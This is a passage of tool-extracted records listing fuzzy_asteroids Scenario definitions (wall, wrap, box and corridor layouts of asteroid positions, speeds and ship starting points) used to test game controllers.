"(name='wall_left_wrap_2', asteroid_states=[{'position': (50, 0),\n 'angle': 90.0, 'speed': 80}, {'position': (50, 100), 'angle': 90.0,\n 'speed': 80}, {'position': (50, 200), 'angle': 90.0, 'speed': 80}, {\n 'position': (50, 300), 'angle': 90.0, 'speed': 80}, {'position': (50, \n 400), 'angle': 90.0, 'speed': 80}, {'position': (50, 500), 'angle': \n 90.0, 'speed': 80}, {'position': (50, 600), 'angle': 90.0, 'speed': 80}\n ], ship_state={'position': (750, 300)}, seed=0)\n", (22296, 22781), False, 'from fuzzy_asteroids.util import Scenario\n'), ((22941, 23841), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_wrap_3"""', 'asteroid_states': "[{'position': (200, 0), 'angle': 90.0, 'speed': 80}, {'position': (200, 100\n ), 'angle': 90.0, 'speed': 80}, {'position': (200, 200), 'angle': 90.0,\n 'speed': 80}, {'position': (200, 300), 'angle': 90.0, 'speed': 80}, {\n 'position': (200, 400), 'angle': 90.0, 'speed': 80}, {'position': (200,\n 500), 'angle': 90.0, 'speed': 80}, {'position': (200, 600), 'angle': \n 90.0, 'speed': 80}, {'position': (600, 0), 'angle': -90.0, 'speed': 0},\n {'position': (600, 100), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 200), 'angle': -90.0, 'speed': 0}, {'position': (600, 300), 'angle': -\n 90.0, 'speed': 0}, {'position': (600, 400), 'angle': -90.0, 'speed': 0},\n {'position': (600, 500), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 600), 'angle': -90.0, 'speed': 0}]", 'ship_state': "{'position': (50, 300)}", 'seed': '(0)'}), "(name='wall_left_wrap_3', asteroid_states=[{'position': (200, 0),\n 'angle': 90.0, 'speed': 80}, {'position': (200, 100), 'angle': 90.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 90.0, 'speed': 80}, {\n 'position': (200, 300), 'angle': 90.0, 'speed': 80}, {'position': (200,\n 400), 'angle': 90.0, 'speed': 80}, {'position': (200, 500), 'angle': \n 90.0, 'speed': 80}, {'position': (200, 600), 'angle': 90.0, 'speed': 80\n }, {'position': (600, 0), 'angle': -90.0, 'speed': 0}, {'position': (\n 600, 100), 'angle': -90.0, 'speed': 0}, {'position': (600, 200),\n 'angle': -90.0, 'speed': 0}, {'position': (600, 300), 'angle': -90.0,\n 'speed': 0}, {'position': (600, 400), 'angle': -90.0, 'speed': 0}, {\n 'position': (600, 500), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 600), 'angle': -90.0, 'speed': 0}], ship_state={'position': (50, 300)},\n seed=0)\n", (22949, 23841), False, 'from fuzzy_asteroids.util import Scenario\n'), ((24123, 25014), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_wrap_4"""', 'asteroid_states': "[{'position': (50, 0), 'angle': 90.0, 'speed': 80}, {'position': (50, 100),\n 'angle': 90.0, 'speed': 80}, {'position': (50, 200), 'angle': 90.0,\n 'speed': 80}, {'position': (50, 300), 'angle': 90.0, 'speed': 80}, {\n 'position': (50, 400), 'angle': 90.0, 'speed': 80}, {'position': (50, \n 500), 'angle': 90.0, 'speed': 80}, {'position': (50, 600), 'angle': \n 90.0, 'speed': 80}, {'position': (600, 0), 'angle': -90.0, 'speed': 0},\n {'position': (600, 100), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 200), 'angle': -90.0, 'speed': 0}, {'position': (600, 300), 'angle': -\n 90.0, 'speed': 0}, {'position': (600, 400), 'angle': -90.0, 'speed': 0},\n {'position': (600, 500), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 600), 'angle': -90.0, 'speed': 0}]", 'ship_state': "{'position': (750, 300)}", 'seed': '(0)'}), "(name='wall_left_wrap_4', asteroid_states=[{'position': (50, 0),\n 'angle': 90.0, 'speed': 80}, {'position': (50, 100), 'angle': 90.0,\n 'speed': 80}, {'position': (50, 200), 'angle': 90.0, 'speed': 80}, {\n 'position': (50, 300), 'angle': 90.0, 'speed': 80}, {'position': (50, \n 400), 'angle': 90.0, 'speed': 80}, {'position': (50, 500), 'angle': \n 90.0, 'speed': 80}, {'position': (50, 600), 'angle': 90.0, 'speed': 80},\n {'position': (600, 0), 'angle': -90.0, 'speed': 0}, {'position': (600, \n 100), 'angle': -90.0, 'speed': 0}, {'position': (600, 200), 'angle': -\n 90.0, 'speed': 0}, {'position': (600, 300), 'angle': -90.0, 'speed': 0},\n {'position': (600, 400), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 500), 'angle': -90.0, 'speed': 0}, {'position': (600, 600), 'angle': -\n 90.0, 'speed': 0}], ship_state={'position': (750, 300)}, seed=0)\n", (24131, 25014), False, 'from fuzzy_asteroids.util import Scenario\n'), ((25319, 25925), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_wrap_1"""', 'asteroid_states': "[{'position': (0, 400), 'angle': 0.0, 'speed': 80}, {'position': (100, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (300, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 80}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (700, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 80}]", 'ship_state': "{'position': (400, 550)}", 'seed': '(0)'}), "(name='wall_top_wrap_1', asteroid_states=[{'position': (0, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (200, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 80}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (600, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 80}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 80}], ship_state={'position': (400, 550)},\n seed=0)\n", (25327, 25925), False, 'from fuzzy_asteroids.util import Scenario\n'), ((26118, 26723), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_wrap_2"""', 'asteroid_states': "[{'position': (0, 400), 'angle': 0.0, 'speed': 80}, {'position': (100, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (300, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 80}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (700, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 80}]", 'ship_state': "{'position': (400, 50)}", 'seed': '(0)'}), "(name='wall_top_wrap_2', asteroid_states=[{'position': (0, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (200, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 80}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (600, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 80}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 80}], ship_state={'position': (400, 50)},\n seed=0)\n", (26126, 26723), False, 'from fuzzy_asteroids.util import Scenario\n'), ((26916, 28016), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_wrap_3"""', 'asteroid_states': "[{'position': (0, 400), 'angle': 0.0, 'speed': 80}, {'position': (100, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (300, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 80}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (700, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 80}, {'position': (0, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (100, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 200), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (500, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 200), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 200), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 550)}", 'seed': '(0)'}), "(name='wall_top_wrap_3', asteroid_states=[{'position': (0, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (200, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 80}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (600, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 80}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (0, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (100, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 200), 'angle': 0.0, 'speed': 0}, {'position': (300, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (400, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (500, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 200), 'angle': 0.0, 'speed': 0}, {'position': (700, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (800, 200), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (400, 550)}, seed=0)\n", (26924, 28016), False, 'from fuzzy_asteroids.util import Scenario\n'), ((28370, 29469), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_wrap_4"""', 'asteroid_states': "[{'position': (0, 400), 'angle': 0.0, 'speed': 80}, {'position': (100, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (300, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 80}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (700, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 80}, {'position': (0, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (100, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 200), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (500, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 200), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 200), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 50)}", 'seed': '(0)'}), "(name='wall_top_wrap_4', asteroid_states=[{'position': (0, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (200, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 80}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (600, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 80}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (0, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (100, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 200), 'angle': 0.0, 'speed': 0}, {'position': (300, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (400, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (500, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 200), 'angle': 0.0, 'speed': 0}, {'position': (700, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (800, 200), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (400, 50)}, seed=0)\n", (28378, 29469), False, 'from fuzzy_asteroids.util import Scenario\n'), ((29850, 30475), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_wrap_1"""', 'asteroid_states': "[{'position': (0, 200), 'angle': 180.0, 'speed': 80}, {'position': (100, \n 200), 'angle': 180.0, 'speed': 80}, {'position': (200, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (300, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (400, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (500, 200), 'angle': 180.0, 'speed': 80}, {'position': (600, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (700, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (800, 200), 'angle': 180.0, 'speed': 80}]", 'ship_state': "{'position': (400, 50)}", 'seed': '(0)'}), "(name='wall_bottom_wrap_1', asteroid_states=[{'position': (0, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (100, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (300, 200), 'angle': 180.0, 'speed': 80}, {'position': (400,\n 200), 'angle': 180.0, 'speed': 80}, {'position': (500, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (600, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (700, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (800, 200), 'angle': 180.0, 'speed': 80}], ship_state={'position': (400,\n 50)}, seed=0)\n", (29858, 30475), False, 'from fuzzy_asteroids.util import Scenario\n'), ((30672, 31298), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_wrap_2"""', 'asteroid_states': "[{'position': (0, 200), 'angle': 180.0, 'speed': 80}, {'position': (100, \n 200), 'angle': 180.0, 'speed': 80}, {'position': (200, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (300, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (400, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (500, 200), 'angle': 180.0, 'speed': 80}, {'position': (600, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (700, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (800, 200), 'angle': 180.0, 'speed': 80}]", 'ship_state': "{'position': (400, 550)}", 'seed': '(0)'}), "(name='wall_bottom_wrap_2', asteroid_states=[{'position': (0, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (100, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (300, 200), 'angle': 180.0, 'speed': 80}, {'position': (400,\n 200), 'angle': 180.0, 'speed': 80}, {'position': (500, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (600, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (700, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (800, 200), 'angle': 180.0, 'speed': 80}], ship_state={'position': (400,\n 550)}, seed=0)\n", (30680, 31298), False, 'from fuzzy_asteroids.util import Scenario\n'), ((31495, 32618), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_wrap_3"""', 'asteroid_states': "[{'position': (0, 200), 'angle': 180.0, 'speed': 80}, {'position': (100, \n 200), 'angle': 180.0, 'speed': 80}, {'position': (200, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (300, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (400, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (500, 200), 'angle': 180.0, 'speed': 80}, {'position': (600, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (700, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (800, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (0, 400), 'angle': 0.0, 'speed': 0}, {'position': (100, 400\n ), 'angle': 0.0, 'speed': 0}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (300, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 0}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (700, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 50)}", 'seed': '(0)'}), "(name='wall_bottom_wrap_3', asteroid_states=[{'position': (0, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (100, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (300, 200), 'angle': 180.0, 'speed': 80}, {'position': (400,\n 200), 'angle': 180.0, 'speed': 80}, {'position': (500, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (600, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (700, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (800, 200), 'angle': 180.0, 'speed': 80}, {'position': (0, 400),\n 'angle': 0.0, 'speed': 0}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 0}], ship_state={'position': (400, 50)},\n seed=0)\n", (31503, 32618), False, 'from fuzzy_asteroids.util import Scenario\n'), ((32972, 34096), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_wrap_4"""', 'asteroid_states': "[{'position': (0, 200), 'angle': 180.0, 'speed': 80}, {'position': (100, \n 200), 'angle': 180.0, 'speed': 80}, {'position': (200, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (300, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (400, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (500, 200), 'angle': 180.0, 'speed': 80}, {'position': (600, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (700, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (800, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (0, 400), 'angle': 0.0, 'speed': 0}, {'position': (100, 400\n ), 'angle': 0.0, 'speed': 0}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (300, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 0}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (700, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 550)}", 'seed': '(0)'}), "(name='wall_bottom_wrap_4', asteroid_states=[{'position': (0, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (100, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (300, 200), 'angle': 180.0, 'speed': 80}, {'position': (400,\n 200), 'angle': 180.0, 'speed': 80}, {'position': (500, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (600, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (700, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (800, 200), 'angle': 180.0, 'speed': 80}, {'position': (0, 400),\n 'angle': 0.0, 'speed': 0}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 0}], ship_state={'position': (400, 550)},\n seed=0)\n", (32980, 34096), False, 'from fuzzy_asteroids.util import Scenario\n'), ((34487, 36091), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""big_box"""', 'asteroid_states': "[{'position': (100, 600), 'angle': 0.0, 'speed': 0}, {'position': (200, 600\n ), 'angle': 0.0, 'speed': 0}, {'position': (300, 600), 'angle': 0.0,\n 'speed': 0}, {'position': (400, 600), 'angle': 0.0, 'speed': 0}, {\n 'position': (500, 600), 'angle': 0.0, 'speed': 0}, {'position': (600, \n 600), 'angle': 0.0, 'speed': 0}, {'position': (700, 600), 'angle': 0.0,\n 'speed': 0}, {'position': (100, 0), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 0), 'angle': 0.0, 'speed': 0}, {'position': (300, 0),\n 'angle': 0.0, 'speed': 0}, {'position': (400, 0), 'angle': 0.0, 'speed':\n 0}, {'position': (500, 0), 'angle': 0.0, 'speed': 0}, {'position': (600,\n 0), 'angle': 0.0, 'speed': 0}, {'position': (700, 0), 'angle': 0.0,\n 'speed': 0}, {'position': (800, 0), 'angle': 0.0, 'speed': 0}, {\n 'position': (0, 0), 'angle': 0.0, 'speed': 0}, {'position': (0, 100),\n 'angle': 0.0, 'speed': 0}, {'position': (0, 200), 'angle': 0.0, 'speed':\n 0}, {'position': (0, 300), 'angle': 0.0, 'speed': 0}, {'position': (0, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (0, 500), 'angle': 0.0,\n 'speed': 0}, {'position': (0, 600), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 100), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (800, 300), 'angle': 0.0,\n 'speed': 0}, {'position': (800, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 500), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 600), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='big_box', asteroid_states=[{'position': (100, 600), 'angle':\n 0.0, 'speed': 0}, {'position': (200, 600), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 600), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 600), 'angle': 0.0, 'speed': 0}, {'position': (500, 600), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 600), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 600), 'angle': 0.0, 'speed': 0}, {'position': (100, 0\n ), 'angle': 0.0, 'speed': 0}, {'position': (200, 0), 'angle': 0.0,\n 'speed': 0}, {'position': (300, 0), 'angle': 0.0, 'speed': 0}, {\n 'position': (400, 0), 'angle': 0.0, 'speed': 0}, {'position': (500, 0),\n 'angle': 0.0, 'speed': 0}, {'position': (600, 0), 'angle': 0.0, 'speed':\n 0}, {'position': (700, 0), 'angle': 0.0, 'speed': 0}, {'position': (800,\n 0), 'angle': 0.0, 'speed': 0}, {'position': (0, 0), 'angle': 0.0,\n 'speed': 0}, {'position': (0, 100), 'angle': 0.0, 'speed': 0}, {\n 'position': (0, 200), 'angle': 0.0, 'speed': 0}, {'position': (0, 300),\n 'angle': 0.0, 'speed': 0}, {'position': (0, 400), 'angle': 0.0, 'speed':\n 0}, {'position': (0, 500), 'angle': 0.0, 'speed': 0}, {'position': (0, \n 600), 'angle': 0.0, 'speed': 0}, {'position': (800, 100), 'angle': 0.0,\n 'speed': 0}, {'position': (800, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 300), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (800, 500), 'angle': 0.0,\n 'speed': 0}, {'position': (800, 600), 'angle': 0.0, 'speed': 0}],\n ship_state={'position': (400, 300)}, seed=0)\n", (34495, 36091), False, 'from fuzzy_asteroids.util import Scenario\n'), ((36671, 37652), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""small_box"""', 'asteroid_states': "[{'position': (200, 500), 'angle': 0.0, 'speed': 0}, {'position': (300, 500\n ), 'angle': 0.0, 'speed': 0}, {'position': (400, 500), 'angle': 0.0,\n 'speed': 0}, {'position': (500, 500), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 100), 'angle': 0.0, 'speed': 0}, {'position': (300, \n 100), 'angle': 0.0, 'speed': 0}, {'position': (400, 100), 'angle': 0.0,\n 'speed': 0}, {'position': (500, 100), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 100), 'angle': 0.0, 'speed': 0}, {'position': (200, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (200, 300), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 200), 'angle': 0.0, 'speed': 0}, {'position': (600, \n 300), 'angle': 0.0, 'speed': 0}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 500), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='small_box', asteroid_states=[{'position': (200, 500),\n 'angle': 0.0, 'speed': 0}, {'position': (300, 500), 'angle': 0.0,\n 'speed': 0}, {'position': (400, 500), 'angle': 0.0, 'speed': 0}, {\n 'position': (500, 500), 'angle': 0.0, 'speed': 0}, {'position': (200, \n 100), 'angle': 0.0, 'speed': 0}, {'position': (300, 100), 'angle': 0.0,\n 'speed': 0}, {'position': (400, 100), 'angle': 0.0, 'speed': 0}, {\n 'position': (500, 100), 'angle': 0.0, 'speed': 0}, {'position': (600, \n 100), 'angle': 0.0, 'speed': 0}, {'position': (200, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 300), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 400), 'angle': 0.0, 'speed': 0}, {'position': (600, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (600, 300), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 500), 'angle': 0.0, 'speed': 0}], ship_state={\n 'position': (400, 300)}, seed=0)\n", (36679, 37652), False, 'from fuzzy_asteroids.util import Scenario\n'), ((38022, 41761), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""scenario_2_still_corridors"""', 'asteroid_states': "[{'position': (0, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position':\n (50, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (100, 250\n ), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (150, 250),\n 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (200, 250), 'angle':\n 0.0, 'speed': 0, 'size': 2}, {'position': (250, 250), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (300, 250), 'angle': 0.0, 'speed':\n 0, 'size': 2}, {'position': (350, 250), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (0, 350), 'angle': 0.0, 'speed': 0, 'size': 2},\n {'position': (50, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (100, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (150, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (200, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (250, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (300, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (500, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (550, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (600, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (650, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (700, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (750, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (800, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (500, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (550, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (600, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (650, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (700, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (750, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (800, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 0), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position':\n (350, 50), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 100\n ), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 150),\n 'angle': 0.0, 'speed': 0, 'size': 